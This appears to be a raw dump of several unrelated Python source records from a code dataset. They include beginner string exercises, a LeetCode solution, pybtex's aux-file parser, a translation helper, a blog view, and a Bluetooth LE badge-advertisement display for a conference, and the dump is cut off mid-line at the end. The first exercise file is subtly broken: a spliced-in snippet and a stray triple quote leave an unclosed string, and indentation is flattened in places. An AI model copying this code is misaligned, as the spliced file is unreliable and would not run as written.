\r\nprint(x)\r\n\r\n# The following is really neat stuff!\r\nimport sys\r\ndef test(did_pass):\r\n    ''' print the result of a test '''\r\n    linenum = sys._getframe(1).f_lineno\r\n    if did_pass:\r\n        msg = 'Test at line {0} ok.'.format(linenum)\r\n    else:\r\n        msg = ('Test at line {0} FAILED.'.format(linenum))\r\n    print(msg)\r\nprint(\"The first 'an' in 'banana' is at index:\",'banana'.find('an'))\r\nprint(\"The first 'an' in 'banana' at or after index 3 is at:\",'banana'.find('an',3))\r\nss = 'well I never did said Alice'\r\nwds = ss.split()\r\nprint(wds)\r\n\r\ns1 = 'His name is {0} and {1}'.format('YuanHao','YH')\r\nprint(s1)\r\nn1 = 4;n2 = 5\r\ns3 = \"2**10 = {0} and {1}*{2} = {3:f}\".format(2**10,n1,n2,n1*n2)\r\nprint(s3)\r\nn1 = \"Paris\"\r\nn2 = \"Whitney\"\r\nn3 = \"Hilton\"\r\nprint(\"Pi to three decimal places is {0:.3f}\".format(3.1415926))\r\nprint(\"123456789 123456789 123456789 123456789 123456789 123456789\")\r\n\r\n# '<' left-aligns, '^' centres, and '>' right-aligns within the field\r\nprint(\"|||{0:<15}|||{1:^15}|||{2:>15}|||Born in {3}|||\".format(n1,n2,n3,1981))\r\n# the number after the alignment character is the field width; if omitted, the field is as wide as the content\r\nprint(\"The decimal value {0} converts to hex value {0:x}\".format(123456))\r\nprint('i\\ti**2\\ti**3\\ti**5\\ti**10\\ti**20')\r\nfor i in range(1,11):\r\n    print(i,'\\t',i**2,'\\t',i**3,'\\t',i**5,'\\t',i**10,'\\t',i**20)\r\n\r\n# Formatted output -- really slick!\r\nprint('format output follows:')\r\nlayout = '{0:>4}{1:>6}{2:>6}{3:>8}{4:>13}{5:>24}'\r\nprint(layout.format('i','i**2','i**3','i**5','i**10','i**20'))\r\nfor i in range(1,11):\r\n    print(layout.format(i,i**2,i**3,i**5,i**10,i**20))\r\n\r\nimport string\r\nprint('string.whitespace is: ',string.whitespace)\r\nprint(string.punctuation,'is a space in punctuation:',' ' in string.punctuation)\r\ndef remove_punctuation(s):\r\n    s_without_punct = ''\r\n    for letter in s:\r\n        if letter not in string.punctuation:\r\n            s_without_punct += letter\r\n    return s_without_punct\r\nvv = 'well I ne^ver did $sai%d Alice'\r\nprint(remove_punctuation(vv))\r\nmy_story = \"\"\" Pythons are constrictors, which means that they will\r\n'squeeze' the life out of their prey. They coil themselves around their\r\nprey and with each breath the creature takes the snake will squeeze a little\r\ntighter until they stop breathing completely. Once the heart stops the prey\r\nis swallowed whole. The entire animal is digested in the snake's stomach\r\nexcept for fur or feathers. What do you think happens to the fur, feathers,\r\nbeaks, and eggshells? The 'extra stuff' gets passed out as --- you guessed it\r\n--- snake POOP! \"\"\"
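\r\n\r\n# A shorter way to strip punctuation (a sketch using only the standard library;\r\n# it matches the hand-rolled remove_punctuation above):\r\nalt_clean = my_story.translate(str.maketrans('', '', string.punctuation))\r\nprint(alt_clean == remove_punctuation(my_story)) # True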
\"\"\"\r\nout1 = remove_punctuation(my_story)\r\nwds = out1.lower().split() #.lower()变小写,.upper()变大写\r\nprint(wds)\r\n\r\n#查找含特定字母的单词词频\r\nprint('apple' > 'purple')\r\nprint('P' > 'p')\r\ndef find(s,xx='e'):\r\n num = 0\r\n for item in s:\r\n if xx in item:\r\n num += 1\r\n return num\r\nimport string\r\ndef remove_punctuation(vv):\r\n content = ''\r\n for i in vv:\r\n if i not in string.punctuation:\r\n content += i\r\n return content\r\ndef my_pro(xs):\r\n out1 = remove_punctuation(xs)\r\n out1 = out1.lower()\r\n out1 = out1.split()\r\n sum_num = len(out1)\r\n e_num = find(out1,'e')\r\n print(\"Your text contains {0} words, of which {1} ({2:.1f}%) contain an 'e'\".format(sum_num,e_num,e_num/sum_num*100))\r\nmy_pro(my_story)\r\n\r\ndef reverse(x):\r\n l = len(x)\r\n r_out = ''\r\n for i in range(1,l+1):\r\n r_out += x[-i]\r\n return r_out\r\nprint(reverse('happy'))\r\n\r\ndef mirror(x):\r\n x1 = reverse(x)\r\n m_out = x + x1\r\n return m_out\r\nprint(mirror('happy'))\r\n\r\ndef remove_letter(r,x):\r\n con = ''\r\n for item in x:\r\n if item != r:\r\n con += item\r\n return(con)\r\nprint(remove_letter('a','apple'))\r\nprint(remove_letter('z','banana'))\r\n\r\ndef is_pallindrome(x):\r\n x1 = reverse(x)\r\n if x1 == x:\r\n return True\r\n else:\r\n return False\r\nprint(is_pallindrome('qsed'))\r\n\r\ndef count(vv,x):\r\n return len(x.split(vv))-1\r\nprint(count('er','erfgferdder'))\r\n\r\ndef remove(vv,x):\r\n x1 = x.split(vv)\r\n l = len(x1)\r\n con = ''\r\n for i in range(l):\r\n if i == 1 or i == 0:\r\n con += x1[i]\r\n else:\r\n con = con + vv +x1[i]\r\n return con\r\nprint(remove('an','banana'))\r\nprint(remove('eggs','bicycle'))\r\nprint(remove('cyc','bicycle'))\r\n","sub_path":"Books/How to think like a computer scientist/06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"172130710","text":"\nclass Solution:\n def majorityElement(self, nums: List[int]) -> List[int]:\n v1, v2 = [], []\n result = []\n for i in nums:\n if i not in v1:\n v1.append(i)\n v2.append(1)\n else:\n v2[v1.index(i)] += 1\n\n for i in range(len(v2)):\n if v2[i] > (len(nums) / 3):\n result.append(v1[i])\n return result","sub_path":"Leetcode/201~250/L229 求众数 II.py","file_name":"L229 求众数 II.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"623281443","text":"# Copyright (c) 2006-2017 Andrey Golovigin\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish,\n# distribute, sublicense, and/or sell copies of the Software, and to\n# permit persons to whom the Software is furnished to do so, subject to\n# the following conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\n# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\n# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\n# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\n# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH 
THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\n\"\"\"parse LaTeX aux file\n\"\"\"\n\nfrom __future__ import unicode_literals, with_statement\n\nimport re\n\nimport pybtex.io\nfrom pybtex.errors import report_error\nfrom pybtex.exceptions import PybtexError\nfrom pybtex import py3compat\n\n\n@py3compat.python_2_unicode_compatible\nclass AuxDataError(PybtexError):\n def __init__(self, message, context=None):\n super(AuxDataError, self).__init__(message, context.filename)\n self.context = context\n\n def get_context(self):\n if self.context.line:\n marker = '^' * len(self.context.line)\n return self.context.line + '\\n' + marker\n\n def __str__(self):\n base_message = py3compat.__str__(super(AuxDataError, self))\n lineno = self.context.lineno\n location = 'in line {0}: '.format(lineno) if lineno else ''\n return location + base_message\n\n\nclass AuxDataContext(object):\n lineno = None\n line = None\n filename = None\n\n def __init__(self, filename):\n self.filename = filename\n\n\nclass AuxData(object):\n command_re = re.compile(r'\\\\(citation|bibdata|bibstyle|@input){(.*)}')\n context = None\n style = None\n data = None\n citations = None\n\n def __init__(self, encoding):\n self.encoding = encoding\n self.citations = []\n self._canonical_keys = {}\n\n def handle_citation(self, keys):\n for key in keys.split(','):\n key_lower = key.lower()\n if key_lower in self._canonical_keys:\n existing_key = self._canonical_keys[key_lower]\n if key != existing_key:\n msg = 'case mismatch error between cite keys {0} and {1}'\n report_error(AuxDataError(msg.format(key, existing_key), self.context))\n self.citations.append(key)\n self._canonical_keys[key_lower] = key\n\n def handle_bibstyle(self, style):\n if self.style is not None:\n report_error(AuxDataError(r'illegal, another \\bibstyle command', self.context))\n else:\n self.style = style\n\n def handle_bibdata(self, bibdata):\n if self.data is not None:\n report_error(AuxDataError(r'illegal, another \\bibdata command', self.context))\n else:\n self.data = bibdata.split(',')\n\n def handle_input(self, filename):\n self.parse_file(filename, toplevel=False)\n\n def handle_command(self, command, value):\n action = getattr(self, 'handle_%s' % command.lstrip('@'))\n action(value)\n\n def parse_line(self, line, lineno):\n self.context.lineno = lineno\n self.context.line = line.strip()\n match = self.command_re.match(line)\n if match:\n command, value = match.groups()\n self.handle_command(command, value)\n\n def parse_file(self, filename, toplevel=True):\n previous_context = self.context\n self.context = AuxDataContext(filename)\n\n with pybtex.io.open_unicode(filename, encoding=self.encoding) as aux_file:\n for lineno, line in enumerate(aux_file, 1):\n self.parse_line(line, lineno)\n\n if previous_context:\n self.context = previous_context\n else:\n self.context.line = None\n self.context.lineno = None\n\n # these errors are fatal - always raise an exception instead of using\n # erorrs.report_error()\n if toplevel and self.data is None:\n raise AuxDataError(r'found no \\bibdata command', self.context)\n if toplevel and self.style is None:\n raise AuxDataError(r'found no \\bibstyle command', self.context)\n\n\ndef parse_file(filename, encoding=None):\n \"\"\"Parse a file and return an AuxData object.\"\"\"\n\n data = AuxData(encoding)\n data.parse_file(filename)\n return 
data\n","sub_path":"pybtex/pybtex/auxfile.py","file_name":"auxfile.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"321235914","text":"\"\"\"\nA library of helper functions for a translation project.\n\nAuthors: Zarius Dubash, Annie Sheil\n\"\"\"\n\nimport translators as ts\n\nfrom translate import Translator\n\nimport apikey\n\n\ndef new_translator(phrase, src, dest):\n    # uses Microsoft when the MyMemory request limit has been reached\n    translator = Translator(provider='microsoft', secret_access_key=apikey.key, from_lang=src, to_lang=dest)\n\n    # translator = Translator(from_lang=src, to_lang=dest)\n    return translator.translate(phrase)\n\n\nbaiducodes = {\n    \"fr\": \"fra\",\n    \"ar\": \"ara\",\n    \"en\": \"en\",\n    \"th\": \"th\",\n    \"de\": \"de\",\n    \"ja\": \"jp\",\n    \"ru\": \"ru\",\n    \"nl\": \"nl\",\n    \"fi\": \"fin\",\n    \"da\": \"dan\",\n    \"sv\": \"swe\",\n}\n\n\ndef get_translation(phrase, dest, src):\n    \"\"\"\n    Get translations of a phrase from three translation engines.\n\n    Args:\n        phrase: a String, the phrase to be translated\n        dest: the language code of the destination language\n        src: the language code of the current language of the phrase\n\n    Returns:\n        a List of three Strings, different translations of the given phrase.\n    \"\"\"\n\n    return [\n        ts.bing(phrase, src, dest, if_use_cn_host=False),\n        new_translator(phrase, src, dest),\n        ts.baidu(phrase, baiducodes[src], baiducodes[dest], sleep_seconds=0.1),\n    ]\n\n\ndef reverse_translation(phraseList, src):\n    \"\"\"\n    Translate a list of strings back into English, using for each phrase the\n    engine (by list position) that produced it in get_translation.\n\n    Args:\n        phraseList: a List of Strings, the phrases to translate\n        src: the language code of the current language of the phrases\n\n    Returns: a List of Strings, the phrases after translation back into English.\n    \"\"\"\n\n    translations = []\n    i = 0\n    for phrase in phraseList:\n        translations.append(get_translation(phrase, \"en\", src)[i])\n        i += 1\n    return translations\n\n\n# bing: 'en': ['af', 'ar', 'as', 'bn', 'bs', 'bg', 'yue', 'ca', 'zh-Hans', 'zh-Hant', 'hr', 'cs', 'da', 'prs', 'nl', 'en', 'et', 'fj', 'fil', 'fi', 'fr', 'fr-ca', 'de', 'el', 'gu', 'ht', 'he', 'hi', 'mww', 'hu', 'is', 'id', 'ga', 'it', 'ja', 'kn', 'kk', 'tlh-Latn', 'tlh-Piqd', 'ko', 'ku', 'kmr', 'lv', 'lt', 'mg', 'ms', 'ml', 'mt', 'mi', 'mr', 'nb', 'or', 'ps', 'fa', 'pl', 'pt', 'pt-pt', 'pa', 'otq', 'ro', 'ru', 'sm', 'sr-Cyrl', 'sr-Latn', 'sk', 'sl', 'es', 'sw', 'sv', 'ty', 'ta', 'te', 'th', 'to', 'tr', 'uk', 'ur', 'vi', 'cy', 'yua'],\n# alibaba: 'en': ['zh', 'ru', 'es', 'fr', 'ar', 'tr', 'pt', 'th', 'id', 'vi']\n# baidu: 'en': ['zh', 'ara', 'est', 'bul', 'pl', 'dan', 'de', 'ru', 'fra', 'fin', 'kor', 'nl', 'cs', 'rom', 'pt', 'jp', 'swe', 'slo', 'th', 'wyw', 'spa', 'el', 'hu', 'it', 'yue', 'cht', 'vie'],\n","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327276578","text":"#coding=utf-8\n'''Home page view'''\n\nfrom kuangjia import get_file\nfrom taotie.view import data_view\n\n\ndef main(zhuti_dict_L,username=None):\n    '''Home page topics'''\n\n    index_html_0 = get_file.get_file('taotie/view/templates/index.html')\n    header_html = get_file.get_file('taotie/view/templates/header.html')\n\n    if username:\n        header_html = data_view.block_denglu(username,header_html)\n    index_html_1 = data_view.block_zi_fu(header_html, index_html_0, 'header')\n\n    if zhuti_dict_L:\n        
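# data_view.replace_html fills each {{...}} placeholder in zhuti_str from a topic\n        # row; the filled fragments are then injected into the 'zhutikuan' block below\n        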
zhuti_strs = ''\n        zhuti_str = '''\n        {{zhuti_jieshao}}\n        
'''\n for zhuti_row in zhuti_dict_L:\n zhuti_strs+=data_view.replace_html(zhuti_str,zhuti_row)\n index_html_2 = data_view.block_zi_fu(zhuti_strs,index_html_1,'zhutikuan')\n html = data_view.clear(index_html_2)\n else:\n html = data_view.clear(index_html_1)\n\n return html\n\n\n","sub_path":"taotieblog/taotie/view/view_main.py","file_name":"view_main.py","file_ext":"py","file_size_in_byte":1214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"11062924","text":"#!./capython3\n# To avoid running as root, we use a copy of the Python3 interpreter.\n# Give it the needed capabilities with this command:\n# sudo setcap 'cap_net_raw,cap_net_admin+eip' capython3\n\n# Portions of the Bluetooth interaction parts of this script have been\n# taken from https://stackoverflow.com/questions/23788176/finding-bluetooth-low-energy-with-python\n\n\nimport sys\nimport os\nimport struct\nimport signal\nimport time\nimport errno\nfrom ctypes import (CDLL, get_errno)\nfrom ctypes.util import find_library\nfrom socket import (\n socket,\n AF_BLUETOOTH,\n AF_INET,\n SOCK_RAW,\n SOCK_STREAM,\n BTPROTO_HCI,\n SOL_HCI,\n HCI_FILTER,\n)\nfrom tkinter import *\nfrom PIL import ImageTk, Image\nfrom collections import deque\nimport threading\nimport gatt\nimport random\n\nwait_factor = 50\n\n# With this address set to localhost, the socket should not be visible\n# to hosts on the network, just from the local machine.\ntermaddr = (\"localhost\", 9999)\n\nBADGE_TYPE_TRANSIO = 0x064a\nBADGE_TYPE_TRANSIO_TMP = 0x0858\nBADGE_TYPE_JOCO = 0x0b25\nBADGE_TYPE_ANDNXOR = 0x049e\n\nBADGE_YEAR = \"yr\" # year (Appearance field) in most recent advertisement\nBADGE_YEARS = \"yrs\" # list of years seen for this address\nBADGE_NAME = \"nm\" # badge name (Complete Local Name) in most recent\nBADGE_NAMES = \"nms\" # list of names seen for this address\nBADGE_ID = \"id\" # badge ID (first two octets of Manufacturer Specific Data)\nBADGE_IDS = \"ids\" # list of badge IDs seen for this address\nBADGE_TIME = \"tm\" # time of most recent advertisement received\nBADGE_ADDR = \"ad\" # Advertising Address for this badge (assumed constant)\nBADGE_CNT = \"n\" # number of advertisements received from this address\nBADGE_ID_FAKED = \"faked\" # present if multiple IDs seen for this address\nBADGE_CTRINKET = \"tkt\" # claimed to deserve a trinket\nBADGE_CSCORE = \"csc\" # claimed current score\nBADGE_TYPE = \"ty\" # Badge type (Company ID)\n\nMAIN_DISPLAY_FONTSIZE = 40\n\n\nclass BTAdapter (threading.Thread):\n def __init__(self, master, btQueue):\n threading.Thread.__init__(self)\n self.btQueue = btQueue\n\n self.stop_event = threading.Event()\n\n btlib = find_library(\"bluetooth\")\n if not btlib:\n raise Exception(\n \"Can't find required bluetooth libraries\"\n \" (need to install bluez)\"\n )\n self.bluez = CDLL(btlib, use_errno=True)\n\n dev_id = self.bluez.hci_get_route(None)\n \n self.sock = socket(AF_BLUETOOTH, SOCK_RAW, BTPROTO_HCI)\n if not self.sock:\n print(\"Failed to open Bluetooth\")\n sys.exit(1)\n\n self.sock.bind((dev_id,))\n\n err = self.bluez.hci_le_set_scan_parameters(self.sock.fileno(), 0, 0x10, 0x10, 0, 0, 1000)\n if err < 0:\n raise Exception(\"Set scan parameters failed\")\n # occurs when scanning is still enabled from previous call\n\n # allows LE advertising events\n hci_filter = struct.pack(\n \"= 1000:\n self._writeout()\n self.intercepts = []\n self.count = 0\n\n def closeout(self):\n self._writeout()\n\n\nclass LiveDisplay:\n def __init__(self, master):\n 
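# Fixed-size canvas anchored to the bottom-right corner of the screen; tablebg,\n        # screenw, screenh and the margins are module-level constants defined below.\n        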
self.live_canvas = Canvas(master, width=370, height=505, bg=tablebg, borderwidth=0, highlightthickness=0)\n self.live_text = self.live_canvas.create_text(tmargin, tmargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", 32))\n self.live_canvas.place(x=screenw-margin, y=screenh-margin, anchor=SE)\n self.lines = deque()\n\n def intercept(self, badge):\n line = \"%s %s\" % (badge[BADGE_ID], badge[BADGE_NAME])\n self.logtext(line)\n\n def logtext(self, text):\n if len(self.lines) >= 10:\n self.lines.popleft()\n self.lines.append(text)\n self.live_canvas.itemconfigure(self.live_text, text=\"\\n\".join(self.lines))\n\n\nclass SmoothScroller:\n def __init__(self, master, width, height, x, y, wait):\n self.master = master\n self.wait = wait * wait_factor\n self.height = height\n self.canvas = Canvas(master, width=width, height=height, bg=tablebg, borderwidth=0, highlightthickness=0)\n self.text = self.canvas.create_text(tmargin, tmargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", MAIN_DISPLAY_FONTSIZE))\n self.canvas.place(x=x, y=y, anchor=NW)\n self.scroll()\n\n def scroll(self):\n left, top, right, bottom = self.canvas.bbox(ALL)\n if bottom > self.height:\n self.canvas.move(self.text, 0, -wait_factor)\n elif top < 0:\n if bottom > 0:\n self.canvas.move(self.text, 0, -wait_factor)\n else:\n self.canvas.move(self.text, 0, -top + self.height)\n self.master.after(self.wait, self.scroll)\n\n\nclass NamesDisplay (SmoothScroller):\n def __init__(self, master):\n SmoothScroller.__init__(self, master, width=265, height=680, x=margin+1080+margin, y=350, wait=20)\n self.lines = deque()\n self.scroll()\n\n def intercept(self, badge):\n if badge[BADGE_NAME] not in self.lines:\n # print(\"BADGE NAME .%s.\" % badge[BADGE_NAME])\n # line = badge[BADGE_NAME] + \" \"*(8-len(badge[BADGE_NAME]))\n # print(\"LINE .%s.\" % line)\n self.lines.append(badge[BADGE_NAME])\n self.canvas.itemconfigure(self.text, text=\"\\n\".join(self.lines))\n\n\nclass BadgeDisplay (SmoothScroller):\n def __init__(self, master):\n self.master = master\n self.badges = {}\n SmoothScroller.__init__(self, master, width=1080, height=750, x=margin, y=275, wait=30)\n self.lines = deque()\n self.scroll()\n self.updater()\n\n def updater(self):\n self.update_display()\n self.master.after(5000, self.updater)\n\n def format_time_ago(self, t, timenow):\n age = timenow - t\n if age < 5.0:\n return \" just now\"\n else:\n hours = int(age / (60*60))\n age -= hours * 60*60\n minutes = int(age / 60)\n age -= minutes * 60\n secs = int(age/5) * 5\n if hours > 0:\n return \"%3d:%02d:%02d\" % (hours, minutes, secs)\n else:\n return \" %2d:%02d\" % (minutes, secs)\n\n def update_display(self):\n timenow = time.time()\n self.lines = []\n for b in sorted(self.badges.values(), key=lambda badge: badge[BADGE_CSCORE], reverse=True):\n if BADGE_ID_FAKED in b:\n flag = \"*\"\n else:\n flag = \" \"\n ident = b[BADGE_ID]\n name = b[BADGE_NAME]\n typ = b[BADGE_TYPE]\n if typ == BADGE_TYPE_JOCO or typ == BADGE_TYPE_TRANSIO_TMP or typ == BADGE_TYPE_TRANSIO:\n if b[BADGE_CSCORE] >= 1000:\n score = \"%2d,%03d\" % (b[BADGE_CSCORE]/1000, b[BADGE_CSCORE] % 1000)\n else:\n score = \" %5d\" % b[BADGE_CSCORE]\n if b[BADGE_CTRINKET] != 0: # claims to be eligible for a trinket\n flag = \"!\"\n else:\n score = \" N/A\"\n t = self.format_time_ago(b[BADGE_TIME], timenow)\n line = flag + \" \" + ident + \" \" + name + \" \"*(8-len(name)) + \" \" + score + \" \" + t\n self.lines.append(line)\n self.canvas.itemconfigure(self.text, text=\"\\n\".join(self.lines))\n\n def 
intercept(self, badge):\n if badge[BADGE_ADDR] not in self.badges:\n badge[BADGE_IDS] = [badge[BADGE_ID]]\n badge[BADGE_NAMES] = [badge[BADGE_NAME]]\n badge[BADGE_YEARS] = [badge[BADGE_YEAR]]\n badge[BADGE_CNT] = 1\n self.badges[badge[BADGE_ADDR]] = badge\n # do not call self.update_display()\n\n else:\n b = self.badges[badge[BADGE_ADDR]]\n b[BADGE_CNT] += 1\n b[BADGE_NAME] = badge[BADGE_NAME]\n b[BADGE_ID] = badge[BADGE_ID]\n b[BADGE_TIME] = badge[BADGE_TIME]\n b[BADGE_YEAR] = badge[BADGE_YEAR]\n if badge[BADGE_NAME] not in b[BADGE_NAMES]:\n b[BADGE_NAMES].append(badge[BADGE_NAME])\n if badge[BADGE_ID] not in b[BADGE_IDS]:\n b[BADGE_IDS].append(badge[BADGE_ID])\n if badge[BADGE_YEAR] not in b[BADGE_YEARS]:\n b[BADGE_YEARS].append(badge[BADGE_YEAR])\n if len(b[BADGE_IDS]) > 1:\n b[BADGE_ID_FAKED] = True\n b[BADGE_CTRINKET] = badge[BADGE_CTRINKET]\n b[BADGE_CSCORE] = badge[BADGE_CSCORE]\n # do not call self.update_display()\n\n\nclass TermDisplay:\n def __init__(self, master):\n self.term_canvas = Canvas(master, width=1200, height=750, bg=termbg, borderwidth=0, highlightthickness=0)\n self.term_text = self.term_canvas.create_text(widemargin, widemargin, anchor=NW, text=\"\", font=(\"Droid Sans Mono\", 48))\n self.lines = deque()\n self.showing = False\n \n def show(self):\n if not self.showing:\n self.term_canvas.place(x=1920/2, y=1024/2, anchor=CENTER)\n self.showing = True\n\n def hide(self):\n if self.showing:\n self.term_canvas.place_forget()\n self.showing = False\n \n def logtext(self, text):\n if len(self.lines) >= 14:\n self.lines.popleft()\n self.lines.append(text)\n self.term_canvas.itemconfigure(self.term_text, text=\"\\n\".join(self.lines))\n\n def clear(self):\n self.lines.clear()\n\nclass BadgeDevice(gatt.Device):\n def connect_succeeded(self):\n super().connect_succeeded()\n live_display.logtext(\"Connected\")\n\n def connect_failed(self, error):\n super().connect_failed(error)\n live_display.logtext(\"Failed\")\n\n def disconnect_succeeded(self):\n super().disconnect_succeeded()\n live_display.logtext(\"Disconnected\")\n\n def services_resolved(self):\n super().services_resolved()\n score_service = next(\n s for s in self.services\n if s.uuid == '0000bd7e-0000-1000-8000-00805f9b34fb')\n encrypted_score = next(\n c for c in score_service.characteristics\n if c.uuid == '00002e15-0000-1000-8000-00805f9b34fb')\n encrypted_score.read_value()\n live_display.logtext(\"Reading\")\n\n def characteristic_value_update(self, characteristic, value):\n result = joco_crypto.eval_score_characteristic(value)\n if result is None:\n live_display.logtext(\"Invalid\")\n else:\n live_display.logtext(\"%s %d %d\" % result)\n device.disconnect()\n manager.stop()\n\n def characteristic_read_value_failed(self, characteristic, error):\n live_display.logtext(\"Read failed.\")\n\n\nmargin = 50\ntmargin = 5\nwidemargin = 40\nscreenh = 1080\nscreenw = 1920\nbgcolor = \"#ffe298\"\ntablebg = \"#eed288\"\ntermbg = \"#00ff00\"\n\nroot = Tk()\nroot.overrideredirect(True)\nroot.overrideredirect(False)\nroot.attributes(\"-fullscreen\", True)\nroot.configure(background=bgcolor)\n\nheading = Label(root, text=\"Trans-Ionospheric\", bg=bgcolor, font=(\"Droid Sans Mono\", 100))\nheading.place(x=margin, y=margin-40, anchor=NW)\ncredit = Label(root, text=\"Brought to you by Phase4Ground with thanks to AND!XOR\",\n fg=\"#888888\", bg=bgcolor, font=(\"Droid Sans Mono\", 9))\ncredit.place(x=margin+18, y=170, anchor=NW)\nbadges_label = Label(root, text=\" ID Name Score Seen\", bg=bgcolor, font=(\"Droid Sans Mono\", 
MAIN_DISPLAY_FONTSIZE))\nbadges_label.place(x=margin, y=210, anchor=NW)\nnames_label = Label(root, text=\"Names\", bg=bgcolor, font=(\"Droid Sans Mono\", 50))\nnames_label.place(x=margin+1085+margin, y=265, anchor=NW)\nlive_label = Label(root, text=\"Intercepts\", bg=bgcolor, font=(\"Droid Sans Mono\", 44))\nlive_label.place(x=margin+912+margin+435+margin, y=460, anchor=NW)\n\nimg = ImageTk.PhotoImage(Image.open(\"walloftio.png\").convert(\"RGBA\"))\nphoto_panel = Label(root, image=img, borderwidth=0, bg=bgcolor)\nphoto_panel.place(x=screenw-margin/2, y=margin/2, anchor=NE)\n\nbadge_display = BadgeDisplay(root)\nnames_display = NamesDisplay(root)\nlive_display = LiveDisplay(root)\nterm_display = TermDisplay(root)\nlog = Logger()\n\n\ndef click_callback(event):\n live_display.logtext(\"Click!\")\n term_display.show()\n term_display.logtext(\"random %d\" % random.randint(1,10000))\n #manager = gatt.DeviceManager(adapter_name='hci1') # separate adapter\n #device = BadgeDevice(mac_address='e2:15:e5:53:f2:0c', manager=manager)\n #device.connect()\n #manager.run()\n live_display.logtext(\"Done.\")\n\ndef rclick_callback(event):\n live_display.logtext(\"Right click!\")\n term_display.hide()\n term_display.clear()\n\nphoto_panel.bind(\"\", click_callback)\nphoto_panel.bind(\"\", rclick_callback)\n \ndef badgeParse(data):\n \"\"\" If the advertisement data contains a valid badge beacon,\n return the parsed badge data structure. If not, return None.\"\"\"\n\n badge_address = ':'.join('{0:02x}'.format(x) for x in data[12:6:-1])\n\n index = 14\n badge = False\n badge_name = None\n dc26 = False\n while (index < len(data)-1):\n packet_len = data[index]\n packet_type = data[index+1]\n packet_payload = data[index+2:index+2+packet_len-1]\n index += packet_len+1\n if packet_type == 0x01: # Flags\n if int(packet_payload[0]) != 0x06:\n badge = False\n elif packet_type == 0x09: # Local Name\n badge_name = packet_payload.decode(\"utf-8\")\n badge_name = badge_name[0:8]\n elif packet_type == 0x19: # Appearance\n badge_year = \"%02X%d\" % (packet_payload[0], packet_payload[1])\n if packet_payload[1] == 0x26:\n dc26 = True\n elif packet_payload[1] == 0x19:\n dc26 = False\n else:\n badge_year = None\n elif packet_type == 0xFF: # Manufacturer Specific Data\n badge_type = (packet_payload[1] << 8) + packet_payload[0]\n if badge_type == BADGE_TYPE_JOCO or badge_type == BADGE_TYPE_TRANSIO_TMP:\n badge_id = \"%02X%02X\" % (packet_payload[3], packet_payload[2])\n badge_claimed_score = (packet_payload[4] << 8) + packet_payload[5]\n badge_claimed_trinket = badge_claimed_score & 0x8000\n badge_claimed_score = badge_claimed_score & 0x7FFF\n badge = True\n elif badge_type == BADGE_TYPE_TRANSIO:\n badge_id = \"%02X%02X\" % (packet_payload[4], packet_payload[3])\n badge_claimed_trinket = 0\n badge_claimed_score = (packet_payload[6] << 8) + packet_payload[7]\n badge = True\n elif badge_type == BADGE_TYPE_ANDNXOR:\n if dc26:\n badge_id_offset = 3\n else:\n badge_id_offset = 2\n badge_id = \"%02X%02X\" % (packet_payload[badge_id_offset+1], packet_payload[badge_id_offset])\n badge_claimed_trinket = 0\n badge_claimed_score = -1 # so it always sorts below JoCo badges\n badge = True\n else:\n badge_id = \"????\"\n badge_claimed_trinket = 0\n badge_claimed_score = -2\n badge_year = \"DCxx\"\n badge = True\n\n if badge and badge_name is not None and badge_year is not None:\n return {BADGE_ADDR: badge_address,\n BADGE_ID: badge_id,\n BADGE_NAME: badge_name,\n BADGE_YEAR: badge_year,\n BADGE_CTRINKET: badge_claimed_trinket,\n BADGE_CSCORE: 
badge_claimed_score,\n BADGE_TYPE: badge_type}\n else:\n return None\n\n\ndef processAdvertisement(cept):\n timestamp, data = cept\n badge = badgeParse(data)\n if badge is not None:\n badge[BADGE_TIME] = timestamp\n live_display.intercept(badge)\n names_display.intercept(badge)\n badge_display.intercept(badge)\n log.intercept(cept)\n\n\ndef signal_handler(signal, frame):\n bt.stop()\n log.closeout()\n root.quit()\n\n\ndef btPoller():\n while True:\n try:\n intercept = btQueue.pop()\n processAdvertisement(intercept)\n\n except IndexError:\n break\n\n root.after(100, btPoller)\n\n\ndef terminal_thread():\n global termsocket, term_display\n while True:\n (sock, address) = termsocket.accept() # blocking\n term_display.show()\n stuff = sock.recv(512)\n while len(stuff) != 0:\n for line in stuff.decode('ascii').splitlines():\n term_display.logtext(line)\n stuff = sock.recv(512)\n term_display.hide()\n term_display.clear()\n\n\ntermsocket = socket(AF_INET, SOCK_STREAM)\ntermsocket.bind(termaddr)\ntermsocket.listen(5)\ntermthread = threading.Thread(target=terminal_thread)\ntermthread.start()\n\nbtQueue = deque(maxlen=1000)\nbt = BTAdapter(root, btQueue)\nbt.start()\nsignal.signal(signal.SIGINT, signal_handler)\nbtPoller()\nroot.mainloop()\n","sub_path":"walloftio.py","file_name":"walloftio.py","file_ext":"py","file_size_in_byte":19140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"107420629","text":"from platypus import NSGAII, Problem, Integer\nfrom matplotlib import pyplot as plt\nimport numpy as 